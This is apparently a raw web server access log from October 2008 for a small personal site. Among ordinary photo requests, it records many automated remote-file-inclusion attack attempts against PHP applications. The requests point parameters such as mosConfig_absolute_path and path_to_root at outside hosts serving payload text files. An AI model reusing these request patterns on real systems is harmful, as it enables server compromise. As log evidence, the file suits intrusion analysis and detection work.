98.136.50.138 - - [26/Oct/2008:09:49:41 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:42 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://sonoma-ave.org/xoops//modules/myalbum/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:44 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:44 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:49:48 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:54 -0700] "GET /logs/access_080820.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:57 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/014-2.jpg HTTP/1.1" 200 307725 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:49:58 -0700] "GET /logs/access_080218.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:50:02 -0700] "GET /logs/SQuery/lib/gore.php?libpath=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:03 -0700] "GET /SQuery/lib/gore.php?libpath=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:50:04 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:05 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.172.64 - - [26/Oct/2008:09:50:11 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [26/Oct/2008:09:50:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:12 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:50:20 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-004_3.jpg HTTP/1.1" 200 530147 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:50:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-176.jpg HTTP/1.1" 200 360406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:50:27 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:30 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:34 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:50:34 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:09:50:35 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:35 -0700] "GET /logs/access_080918.log//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:36 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.158 - - [26/Oct/2008:09:50:36 -0700] "GET /?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 8097 "-" "libwww-perl/5.65" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:50:37 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:50:38 -0700] "GET /logs/access_080307.log/index1.php?=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:50:39 -0700] "GET /index1.php?=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:09:50:40 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:50:41 -0700] "GET /logs/access_080913.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:50:41 -0700] "GET /logs/access_080913.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:50:41 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:50:42 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:42 -0700] "GET /classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:50:42 -0700] "GET /classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.218.230.131 - - [26/Oct/2008:09:50:42 -0700] "GET /logs/index1.php?=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:42 -0700] "GET /logs/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:50:42 -0700] "GET /logs/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:44 -0700] "GET /logs//?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 70881 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:56 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:50:57 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:51:14 -0700] "GET /blog/wp-content/gallery/2008-26-09-tag/003.jpg HTTP/1.1" 200 468643 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:51:17 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:51:17 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:51:25 -0700] "GET /logs//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:51:26 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:51:27 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0127.jpg HTTP/1.1" 200 426309 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:51:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:51:33 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0121.jpg HTTP/1.1" 200 10816 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
203.146.102.38 - - [26/Oct/2008:09:51:41 -0700] "GET /logs/access_080227.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:51:41 -0700] "GET /components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [26/Oct/2008:09:51:42 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.itpro-ua.com/dotproject//images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:51:47 -0700] "GET /logs//main.php?sayfa=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:51:48 -0700] "GET /main.php?sayfa=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [26/Oct/2008:09:51:54 -0700] "GET /logs/access_080830.log//index.php?DOCUMENT_ROOT=http://www.starwarsally.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:51:56 -0700] "GET /logs//main.php?sayfa=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:51:57 -0700] "GET /main.php?sayfa=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:02 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.144.158.163 - - [26/Oct/2008:09:52:12 -0700] "GET /logs/access_080908.log%20/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.144.158.163 - - [26/Oct/2008:09:52:12 -0700] "GET /errors.php?error=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:12 -0700] "GET /logs/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:52:15 -0700] "GET /logs/access_080322.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:16 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:17 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [26/Oct/2008:09:52:18 -0700] "GET /logs/access_080222.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:21 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:21 -0700] "GET /logs/access_080918.log/classes/core/language.php?rootdir=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [26/Oct/2008:09:52:27 -0700] "GET /logs/access_080810.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.perucasas.com/kickoff.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:52:30 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0057.jpg HTTP/1.1" 200 386259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:52:38 -0700] "GET /logs/access_080228.log//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:09:52:39 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 200 70881 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:52:43 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/018.jpg HTTP/1.1" 200 348123 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:44 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [26/Oct/2008:09:52:44 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:46 -0700] "GET /logs/access_080927.log//page.php?id=http://www.n0ne.moda-ok.com/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.252.82 - - [26/Oct/2008:09:52:46 -0700] "GET /page.php?id=http://www.n0ne.moda-ok.com/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.252.82 - - [26/Oct/2008:09:52:47 -0700] "GET /logs//page.php?id=http://www.n0ne.moda-ok.com/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:48 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:52:48 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:52:48 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:52:49 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:52:54 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:55 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
81.88.49.6 - - [26/Oct/2008:09:52:55 -0700] "GET /config.php?path_to_root=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
81.88.49.6 - - [26/Oct/2008:09:52:55 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
81.88.49.6 - - [26/Oct/2008:09:52:55 -0700] "GET /logs//config.php?path_to_root=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:52:55 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.88.49.25 - - [26/Oct/2008:09:52:56 -0700] "GET /logs//config.php?path_to_root=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.88.49.25 - - [26/Oct/2008:09:52:56 -0700] "GET /logs/access_080213.log//config.php?path_to_root=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.88.49.25 - - [26/Oct/2008:09:52:56 -0700] "GET /config.php?path_to_root=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.88.49.25 - - [26/Oct/2008:09:52:56 -0700] "GET /logs/access_080207.log//config.php?path_to_root=http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:09:52:58 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:53:03 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:53:18 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1026.jpg HTTP/1.1" 200 345929 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
202.144.158.163 - - [26/Oct/2008:09:53:33 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:53:42 -0700] "GET /logs/scripts.log//embed/day.php?path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:53:43 -0700] "GET /embed/day.php?path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:53:43 -0700] "GET /logs//embed/day.php?path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:09:53:47 -0700] "GET /logs/scripts.log//embed/day.php?path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:09:53:47 -0700] "GET /embed/day.php?path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:09:53:47 -0700] "GET /logs//embed/day.php?path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:53:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-127.jpg HTTP/1.1" 200 647576 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:53:54 -0700] "GET /logs/access_080830.log/errors.php?error=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [26/Oct/2008:09:53:56 -0700] "GET /errors.php?error=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:53:57 -0700] "GET /logs/errors.php?error=uid=0(root)%20gid=0(root)%20groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.203.165.110 - - [26/Oct/2008:09:54:07 -0700] "GET /logs/access_080703.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.203.165.110 - - [26/Oct/2008:09:54:07 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.2ebook.com/dtech/test/ipv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
